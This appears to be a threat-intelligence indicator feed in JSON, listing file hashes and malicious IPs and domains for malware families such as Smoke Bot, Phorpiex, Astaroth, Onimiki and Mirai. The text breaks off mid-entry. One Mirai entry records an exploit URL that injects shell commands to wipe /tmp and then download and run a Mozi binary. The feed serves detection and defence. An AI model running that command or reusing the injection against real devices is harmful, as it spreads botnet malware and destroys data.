"id": "5d2515e0ff61f954216baae18daffbd9736ab7e1", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272628103606, + "hash": [ + "7b71341bde89a84db53a596366c34b40", + "e5450a4deb07ac04a149d680457b62ef67ff00c5", + "5d75c5a445ada7ecaac1d207b06d82e5498a5e7750360fb1e77b522f4a0bdb2b" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "902946fc59615e0ce4f84dfdece34e0b56749c62", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272628103850, + "hash": [ + "446bc9f4f93332387c541d690647979b", + "7ef0292351eba18920e82eeff4062556d89e243c", + "46ce9250b71d6356287236f5e74145238e1366b8ab427d3ea8503f93be845b0d" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "5da272c350dc921ca0e90477b93004fdadcb0fcc", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272628104131, + "hash": [ + "dfcca3305fa197f2c7978001010ce5b9", + "c2546639b367c96197122ab94c1fcadedbfd740d", + "7a471eb25ad5d5aeae8d299be9b3265813a220de4b461a7821ededafc8d17bc3" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "911c773d1fd27e00919372fa1996226a0853e46a", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272628104378, + "hash": [ + "6f2aeff65a2330f439abce4cdf1b4466", + "36bdb2d35319babccf3c63f4506797ab18bf5293", + 
"3e36a91c7d9241ae140161ad5bd16277499bf791bae6661133e70d90e3e6f777" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "bb478ec894cb47aa89b0eea0318c6c672eb6bd85", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272628104738, + "hash": [ + "393b94c4aa1cb77ce93467a7391ad6da", + "5940bb7ff6a973edbcb5c213f5be3256c68a31bc", + "0a1d0c2f6b462ec3c883bb4ec76f0b0ea28ff4f533bc92e7446db102f97073ca" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "db8c06feb2c459f66348caf94e25f3114bd13664", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272628161697, + "hash": [ + "8635497364188512e254da7e1be5bcf7", + "e7d5f1e731383d3ddcd7ceafa2c1df0f3792635d", + "1f5337e14a345000dd1f8bcf75f6d26d276788892adf8f338a899620e1bbb3c4" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "f6dac7160fcdf9fb21b99ec44e34a1aef5844e07", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272628161922, + "hash": [ + "bfbf672202b5366a07948787fc8a7612", + "fbcfec926679b277e426658ca2cf4b5b59fb20ac", + "f4314b5b937962c06f0a489a2256a4f2732fc3d08c1067c2c51ae4670c00a492" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "b36895bd1bd2ce3cb3bed57271a84b4a5474a537", + "type": "file", + 
"dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628162143, + "hash": [ + "f84c96dcaef64aed2b220e839d14257e", + "69d07083824b1d957ab86ba8bae9f1c6287f7904", + "7080a9d723740995f65248f33f3762e6e843bb3cbce2f84b82d41b4b699a5e03" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "6df2d168d4c300c9e53b5910a592582c3ede0d0c", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628162375, + "hash": [ + "d143132dd5c226138d2ff8013afeeb00", + "b6e6203ca55e7685bc05f05b779a79ded02cb258", + "b3b5c8dae4a41a48f0e2ec0f317641f5e61b27c2a93bce73bb4b691f8f402de8" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "78eea48700bdb03019d6c081c90ea8e6f85dedab", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628162698, + "hash": [ + "2abcdd6b35afb3f4b3c6fea9f52f118b", + "1014c8f5afa89e7fbdbbf8ff47d58a717a697e6c", + "a00090957f56c39f38fe935d48109b7ed6e3bb1d37b855dc9ca1d72e49ae8fc4" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "0375a1945a2a07810307dba9a77aca073b4250a6", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628163066, + "hash": [ + "53ae051a6d88869ee4654dc3cb9f43f2", + "9b7dba46c7ad73718eb16ebf86dd47a5cf3a12ac", + "73a9828b5bad3b91f0dfff2a351805a1722c6a8b5c0efde8e94ad366780e2156" + ], + "malwareList": [ + { + "name": "Smoke Bot", + 
"aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "95a7f80850239061346983bcaeda6cd4456218e1", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628163316, + "hash": [ + "a544dca1bbfe91f6e69a6606b257c175", + "7e17afa009afdcc8bed0419cd615ded2d6c6d08c", + "c73640b743d7dd1daf9090d09ee26cca3966d4d740101ff9057480e171c20e42" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "4987c808e504cea91a0606e53699b0193affb647", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628225600, + "hash": [ + "b168d571001677a483ec46e47b956d93", + "23e4fe803603681649eb3c7cb00dcad175f7870a", + "2e41784cbf53f1e4839f98245e21526360e33454571bd3cdf660c91848adb352" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "464a8f2a1dd34c6438881f22a5a52df702da6d27", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628225854, + "hash": [ + "9684abbb37955cf020d9e9126133f8d2", + "d0ec47f849530a033393d1ec4f7d2e6d44231d4b", + "72a4d789821a9153f6181debeec84c870d8f47d52a711c76bdaf6c7d8d32855a" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "fdd3f288032a98d6b0a84d0caa171057a63c6653", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628226065, + "hash": 
[ + "b696dc49bfe346e5ec2565f3e5f5002d", + "51dd3b196546c0a72560d0ca40233c8aeeb4db00", + "32272a7ed59fce4077e6689528221da7c233af2f0f6bc868b30e5126479d8b8e" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "a18ead165ce298ed492c73404fb9585105cf2687", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628226299, + "hash": [ + "905c25f5d4c13fbe29b80825e9861d93", + "526859dfef661aa5c572ff38ab8a8f6e24e9edee", + "d70827a88a8fc48eb81441de2216573a0489b54e8aad42219f291bf41e9df87d" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "a01af6a1699e233c87071dbcd78a0b93c09bb1da", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628226549, + "hash": [ + "2578c566156aaa7427e7873bba2162fb", + "541bf645ab79397feb9ce62aaa97fe506ecdb6de", + "88206e5211ecab6631ddb6ea9d9c296caadaa8c616b26afa41299a82b3782bd3" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "a3e1f86f17fd74190f8048128430370a351d59b2", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628226837, + "hash": [ + "8233659dbce70b694f791349a70be5ff", + "67d0f5c080e5a6553d2c9a00a309055168c43926", + "ba74ecae43adc78efaee227a0d7170829b9036e5e7f602cf38f32715efa51826" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + 
{ + "id": "29ca542646c3ca4133f8523d2e667ab925d7392a", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628227153, + "hash": [ + "b5936d56ca8ed943b7fa2bcd35e5843d", + "fcb1fcccb3df1bc1b91855a9b860977bd8adfa61", + "a62ea18ad68d7a850ab2748cc95b9d724911dccaf6da398b8063eb183d8ebfaa" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "0d9051e6d271982eadc3c71153d25aa8eda54f54", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628227381, + "hash": [ + "fede9c5e30830ef01b008a0b1e8d2ec4", + "3bb69feccf746c6804266555650346c6e4e77908", + "8526e48a9b252c12357657c594e8a30bf33985a0577f3809c39514d83a2931e8" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "2e9f362f5db334c272f5922abfd4ed35003cca55", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628227656, + "hash": [ + "51636e7775782f91df225f511b297f96", + "bd338186079c1afd2750416c02b8650dbb6e463a", + "07439f8a2adbe031b3b1f4bca85a8f8e99dfac6499ec6f9261d3c01d7a744bb6" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "34557347d5b8b5043c5b35f1bf5b4f0b77e69c83", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272628279289, + "hash": [ + "679c184a4e7beb62862c1c652a80bcac", + "8034bae393fd2a184a7d58422a6326614511da47", + 
"509836cfab0a99f5c2d8b80c78708a144bccd174041b991230d218979179deaa" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "b1e8d08c7801132f04ade6a0d3f61df84b15b595", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272664441869, + "hash": [ + "9ba4dba71373b2faaaddb5118b394781", + "d1f59b6a5a9fa9b9380def39fff2a6d42e5ebbdc", + "374e343a064ae4a6dd70a24a93c3e4a9d10911a6d35d73ecf5efa143ebf04fa9" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "b8ff5af6e8f590e106377dc19e081b70b38ae738", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272664442112, + "hash": [ + "45a246b02d1779d0fba6cbe2701663cb", + "fb64dd0a3be8649a0a144e0fa484e5cb441d6b4a", + "df1d053dbd17870ca42bb3df121396bb05420f80d1eec860fbb052c8fd06604e" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "bc70941ba52c181e7cafebee47ec5bb54cb7bdeb", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272665870690, + "hash": [ + "caa7ab8fe75eeebcbc0ea55bb39f9a71", + "6e5f44af3aa46bd781a18ea24b9812050dea2080", + "4bf40544a1ffc64b6b26b5f24d8f624b7260cc40b34566b3463cae817bf7b612" + ], + "malwareList": [ + { + "name": "Phorpiex", + "aliases": [ + "Trik", + "Wortrik", + "Phintok" + ] + } + ], + "threatList": null + }, + { + "id": "7ee558042454dae4028d085e1328eefe2dd0e672", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + 
"dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272665870924, + "hash": [ + "a928910f34e95ccb190ce0a25cf47975", + "660906ca31249c7b3c930ebaee1092612d82fddf", + "0ee2dc207f986300dd009138f03d043695c79f31dc5290995d74d17e15eccfc3" + ], + "malwareList": [ + { + "name": "Phorpiex", + "aliases": [ + "Trik", + "Wortrik", + "Phintok" + ] + } + ], + "threatList": null + }, + { + "id": "b8bbad0c651771a6bfcaef5001f25557e6d27ed3", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272666402478, + "hash": [ + "eb36ea4c6296b8336669becf19e6a656", + "ea6b0f83c139bfef78db307fd9788876229d03a8", + "4af51b69e5274bc7f2320a2de22022da92117dccb610906d9216bca4c15275d1" + ], + "malwareList": [ + { + "name": "Astaroth", + "aliases": [ + "Guildma" + ] + } + ], + "threatList": null + }, + { + "id": "9ef7bc8d293466db8e3660dce8e90ac7a5a728de", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272666402700, + "hash": [ + "48b1a9265b7d40a229409c0b97335281", + "ef4448b0105b9c0171e2749442ad9e3b5390cef4", + "2a7b00c2aa20dc8ca31fe473a6edccaf68f70c52353a21ad3b336b8e498a0fd3" + ], + "malwareList": [ + { + "name": "Astaroth", + "aliases": [ + "Guildma" + ] + } + ], + "threatList": null + }, + { + "id": "2b7d6c87bab2eae5c44febf3448ac1d5be31ef4f", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272667519082, + "hash": [ + "bf104d1ef61694d454d031c885cc11f0", + "606a9ededf02e58e3a769fa8edc6b6431458c9f9", + "0b42a93d48e668c426ea979bbeceefefe314709f57947f3184e9c9487440b1b7" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "eebd0af3f884d70c45464c1c865911b1a10216d8", + "type": "file", + "dateFirstSeen": 
"2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272667519405, + "hash": [ + "7fdcd2c263cf80e67e77bda4145468fc", + "49c5bf4fc84deb87fd91ee1fc1fc58ae6998b83e", + "b7f99346bbfcabe4c02abcab902dfdd2e6eed7c065eb60620b119db9e28a7954" + ], + "malwareList": [ + { + "name": "Smoke Bot", + "aliases": [ + "Sharik", + "Dofoil", + "Smoke Loader" + ] + }, + { + "name": "", + "aliases": null + } + ], + "threatList": null + }, + { + "id": "7099c090a26f11945bcb7d8f84f620b2f35a98dc", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17272667543252, + "hash": [ + "184e9dcef41e388b52de4012d0920414", + "e15ed4827d8eb3860b69565cc939d5865cb5ffab", + "90c13369dcfae7b8732f94f760e45240ac50a4537f6bf1bb88d30d43bc75ebae" + ], + "malwareList": [ + { + "name": "Nymeria", + "aliases": [ + "Loda", + "Lodarat" + ] + } + ], + "threatList": null + }, + { + "id": "fd830b7e9bc8432ad153b0bb1d11c45aa86d0bd4", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272667543986, + "hash": [ + "b5b10a91b281c513ded4653c24f4f8a0", + "f22638ee8abf9debfe374e39b8380ee0ab29dd81", + "bddf6abc37e6b822d549332852480f0a51dc236cb7986d62770c317a4fac6a13" + ], + "malwareList": [ + { + "name": "Nymeria", + "aliases": [ + "Loda", + "Lodarat" + ] + } + ], + "threatList": null + }, + { + "id": "b204fad85a23e2f9e5aa91145b44e77a726d6dab", + "type": "file", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17272667544685, + "hash": [ + "4a73e6ceaf20c81a36ea35dc47701d9f", + "bf38e288b7a86b4e59173aaef963022ea7c45170", + "62e5d359a109558b735e7f6eb9b2412322e442974c04f1be60d243a5b0202125" + ], + "malwareList": [ + { + "name": "Nymeria", + "aliases": [ + "Loda", + "Lodarat" + ] + } + ], + "threatList": null + }, + { + "id": "870f4241c7ef2380a67f7919cfbad364b015457c", + "type": 
"network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272669367296, + "ip": [ + "51.158.97.126" + ], + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "6e021471f9de2bac5f8552e30e1a7bbea991b2f7", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "d6e2649e4ff9944d569672efdb56dc83c43e7cfffb74c8ed04333910.appiancloud.com", + "seqUpdate": 17272669367621, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "8001a2029a7ab4ddcf81f3dabe525b0c3cf16e15", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "c4005809d8a43ca6b6ba4e5d92b9604178bcdd7cc27fd6bd934f78ff.appiancloud.com", + "seqUpdate": 17272669367726, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "dcc59a7b4048edd460a76ae403491e2430b2683b", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "398f4440616666a270c2c3d46857328b49b5a9ceba5f12654d1d4cae.appiancloud.com", + "seqUpdate": 17272669367822, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "29b5190080cabeb823075e5caafbed888761a5a5", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "1d549a63a960644e8909ee7dadd9f270d0e8f8b3ad3777f8c220c63c.appiancloud.com", + "seqUpdate": 17272669367908, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "0b5807e04879bfdf308198c4a10a014b1a2d6da0", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": 
"ecdeee877000d81b694713e1a808c90feef8b48034e58679f4902e32.appiancloud.com", + "seqUpdate": 17272669368000, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "905f66f7b863424b6351078bcc36e1cf420cca9a", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "c7f0f2085481d0a6ce181829b1fcfc9f457dfb01f6ae96354e39da64.appiancloud.com", + "seqUpdate": 17272669368091, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "99e83ff8d9a3243f51bfdd79ce0c10f65ee18a45", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "6589ac0d0e32659605cd436f2c428e987b6271de2b17f4cef976d472.appiancloud.com", + "seqUpdate": 17272669368186, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "11aa0d600c33e3442c247cdc0c1e9382b3e80a82", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "185e412ec0b805615398d0208ae52049636f42d39dbb9db3e1902463.appiancloud.com", + "seqUpdate": 17272669368283, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "675f2007e4e72689f3ce293b901f12335d575c8c", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "1d4292e3011e42c8d057bf1817b3067878a19d8320389590b78f4120.appiancloud.com", + "seqUpdate": 17272669368376, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "72e7e37a27ba04f77291726ddc5684bdc3a77bf3", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": 
"74e6190a20ce756135a8480cf067ac55383662d8b9d534200fcb18ca.appiancloud.com", + "seqUpdate": 17272669368467, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "22694dfdd4098ee94bf9eac1cfb652cae8b545e1", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "46cb4e3ddcb42805b46f4bdec0aa029660b8a1866a00e2d36894136a.appiancloud.com", + "seqUpdate": 17272669368559, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "ed3d9bd30b427fe0ccbaef1d0fa84abd80fe63c1", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "8be430c5c3f176d2d54c4d42d6147410f73167a4264bfbeffc118bce.appiancloud.com", + "seqUpdate": 17272669368667, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "1ed7f8ae84562c6867dd0f72708a6cb69b3880f3", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "632477de48c03946988a5a68f63903289a8ad994f0d4ff4bcfdf70da.appiancloud.com", + "seqUpdate": 17272669368777, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "fe326674937c3cba3e0ef9c45db6684bf6af0aef", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "9162943899b14053a9398fae2cec82a83d0214f6e7cde89231e69d93.appiancloud.com", + "seqUpdate": 17272669368875, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "17de688584cc63a617e2dc8f609b83d7a28ac1c0", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": 
"daad2abf4f408241d27a70b471ec97dd39bd696e9f11e6e324d3d7d1.appiancloud.com", + "seqUpdate": 17272669368986, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "ef46c52e006821911889d2bfe629303b966d5743", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "29071e211472c9e0e1f85e8a29ab35638d82d1686fb6c896b68d0274.appiancloud.com", + "seqUpdate": 17272669369080, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "8b99200ad70ca743657f8b3857c6b5e38c8f667d", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "1b75e4fb39446cc0994886f72da9b4c50eee030c1cd78cd976dd814e.appiancloud.com", + "seqUpdate": 17272669369171, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "c9b8fb4b146b09069faea14c675c7e567d4b14b8", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "a7245fb54b9768b50601f93a65f08888f64aa0b09c9324374e3c31dc.appiancloud.com", + "seqUpdate": 17272669369272, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "b10079dfc700f36c31c219716ea797a08d62fe09", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "domain": "9f51212c0cb44f99bff4ac386961b32c83d0e9126a6001b267377951.appiancloud.com", + "seqUpdate": 17272669369367, + "malwareList": [ + { + "name": "Onimiki", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "233c8dbe3d23ad2de5906f2b53d19616531dc83f", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "url": 
"http://194.143.143.120/shell?cd+/tmp;rm+-rf+*;wget+http:/192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17272678044631, + "ip": [ + "194.143.143.120" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "cb9dfd68fd0fb8cc25c38f3e028b0416742cdc51", + "type": "network", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272678044756, + "ip": [ + "27.43.207.10" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "e03d9207420544e4e3093298c4a3013037034b72", + "type": "file", + "dateFirstSeen": "2024-09-25T00:00:00+03:00", + "dateLastSeen": "2024-09-25T00:00:00+03:00", + "seqUpdate": 17272692019930, + "hash": [ + "5c81b60f8a39d0c875836d2b012348e3", + "0507c5546326e1687261410ef33344e11b62966a", 